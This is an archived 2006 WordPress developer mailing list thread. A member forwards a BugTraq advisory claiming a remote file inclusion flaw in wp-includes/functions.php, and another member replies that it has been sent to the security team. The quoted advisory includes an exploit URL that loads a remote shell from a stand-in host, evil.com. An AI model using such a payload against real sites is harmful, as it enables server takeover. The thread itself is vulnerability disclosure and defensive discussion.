[wp-hackers] Wordpress File Inclusion
Aaron Brazell
emmensetech at gmail.com
Mon Nov 13 17:44:41 GMT 2006
It's been sent to security. Probably not a good idea to hit the list
with one of these as it's public and may cause an unnecessary stir.
--
Aaron Brazell
Technology Architect, b5media
“A Global New Media Company”
web:: www.b5media.com, www.technosailor.com
phone:: 410-608-6620
skype:: technosailor
On Nov 13, 2006, at 12:38 PM, Bas Bosman wrote:
> Has anybody seen this post on the BugTraq mailing list?
> (Also on: http://www.securityfocus.com/archive/1/451311/30/0/threaded)
>
> I'm at work and don't have access to my Wordpress test box, so I
> haven't
> verified it yet.
>
> Kind regards,
> Bas Bosman (Nazgul)
>
>
> ---------------------------- Original Message
> ----------------------------
> Subject: Wordpress File Inclusion
> From: vannovax at gmail.com
> Date: Sat, November 11, 2006 3:18
> To: bugtraq at securityfocus.com
> ----------------------------------------------------------------------
> ----
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> WordPress Remote File Inclusion
> Download:http://wordpress.org/latest.zip
> Found by _ANtrAX_ http://foro.c-group.org
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> Vulnerable Code:
> {
> global $posts, $post, $wp_did_header, $wp_did_template_redirect,
> $wp_query,
>
> $wp_rewrite, $wpdb;
>
>
> extract($wp_query->query_vars);
>
>
> require_once($file);
> }
> .....
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> Affected File:
> /wp-includes/functions.php =]
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> Vulnerability:
> www.site.com/wp-includes/functions.php?file=http://evil.com/shell.txt?
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> Greetz:V4MP1R3Z4, FRE4K , PENNISSMEN ,EL GROXO , DEYABU ROOLZ ,
> MATASANOS,C-GROUP STAFF . CHAPINHACK, SysRoot ¬¬
>
>
>
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
More information about the wp-hackers
mailing list